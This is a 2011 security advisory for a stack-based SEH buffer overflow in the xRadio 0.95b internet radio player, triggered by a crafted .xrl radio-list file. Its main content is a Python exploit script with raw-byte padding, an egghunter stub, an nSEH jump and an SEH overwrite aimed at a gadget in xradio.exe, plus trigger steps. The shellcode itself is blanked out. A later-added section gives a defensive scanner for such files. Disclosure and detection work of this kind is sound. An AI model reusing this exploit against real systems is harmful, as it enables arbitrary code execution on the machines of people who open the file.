
xRadio 0.95b Local Buffer Overflow

Posted on 10 February 2011

GotGeek Labs
http://www.gotgeek.com.br/

xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)


[+] Description

With xRadio you can listen to internet radio with Windows Media Player
Technology (tm). You can set up a radio list and import asx files.
The program stays in the tray bar.


[+] Information

Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
Advisory: gg-001-2011
Date: 02-08-2011
Last update: 02-08-2011
Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt
Tested on: Windows XP SP3 (VirtualBox)


[+] Vulnerability

xRadio is affected by a stack-based buffer overflow vulnerability because it
fails to perform adequate boundary checks on user-supplied input.
Successful exploitation of the vulnerability allows an attacker to execute
arbitrary code.
Other versions are also affected but have a different trigger.

Affected Versions:
xRadio 0.95b
xRadio 0.9
xRadio 0.5


[+] Proof of Concept/Codes

#!/usr/bin/python
#
#
# windows/messagebox - 590 bytes
# x86/alpha_upper
# http://www.metasploit.com
#
shellcode = ""  # 590-byte encoded payload not reproduced here

junk = "\x41" * 3248
tag  = "\x77\x30\x30\x74\x77\x30\x30\x74"  # w00tw00t
nops = "\x90" * 230

# Of course we don't need this.. It was just for fun...
#
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")  # 32 bytes

nseh  = "\xeb\x88\x90\x90"  # jump back 118 bytes
seh   = "\x82\xe2\x47\x00"  # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe]
junk2 = "\x42" * 884

try:
    file = open('b0t.xrl','w');
    file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2);
    file.close();
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"
    print "[+] b0t.xrl created."
    print "[+] Open xRadio.exe..."
    print "[+] and Radios >> Edit List >> Save radio list"
    print "[+] Select the *.xrl file, press Yes and boom!!\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"


[+] References

http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio


[+] Credits

b0telh0
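For triage of radio-list files before they are opened, the following added example (not part of the advisory or of xRadio) flags the structural traits the PoC file shows: one oversized field, long single-byte runs, non-printable bytes, and a doubled 4-byte marker that is referenced again. It assumes a .xrl file is a line-oriented text list; the function names, thresholds and both sample inputs are constructed for illustration.

```python
import re

MAX_LINE = 512  # assumed upper bound for one radio-list entry
MIN_RUN = 64    # repeated-byte run treated as padding or a NOP sled

def longest_run(data):
    """Return (byte value, length) of the longest run of one repeated byte."""
    best, i = (0, 0), 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best

def find_egg(data):
    """Return a doubled 4-byte marker that occurs a third time elsewhere,
    as it does when a search stub embeds the marker it looks for."""
    for m in re.finditer(rb"(?s)(?=(.{4})\1)", data):
        egg = m.group(1)
        if len(set(egg)) > 1 and data.count(egg) >= 3:
            return egg
    return None

def scan_xrl(data):
    """Return a list of findings for the raw bytes of one .xrl file."""
    findings = []
    longest = max((len(line) for line in data.splitlines()), default=0)
    if longest > MAX_LINE:
        findings.append("line of %d bytes (limit %d)" % (longest, MAX_LINE))
    value, run = longest_run(data)
    if run >= MIN_RUN:
        findings.append("run of %d x 0x%02x" % (run, value))
    binary = sum(1 for b in data if b > 0x7e or (b < 0x20 and b not in (9, 10, 13)))
    if binary:
        findings.append("%d non-printable bytes" % binary)
    egg = find_egg(data)
    if egg:
        findings.append("doubled marker %r referenced again" % egg)
    return findings

# Constructed samples: inert filler in the PoC's layout, and an assumed benign list.
SUSPICIOUS = b"A" * 3248 + b"w00tw00t" + b"\x90" * 230 + b"\xb8w00t" + b"B" * 884
BENIGN = b"Radio One=http://example.com/one.asx\r\nRadio Two=http://example.com/two.asx\r\n"

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan_xrl(blob) or "clean")
```

The non-printable check is a heuristic: station names in a non-ASCII encoding would also trip it, so treat a lone finding of that kind as a prompt for review rather than a verdict.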

 
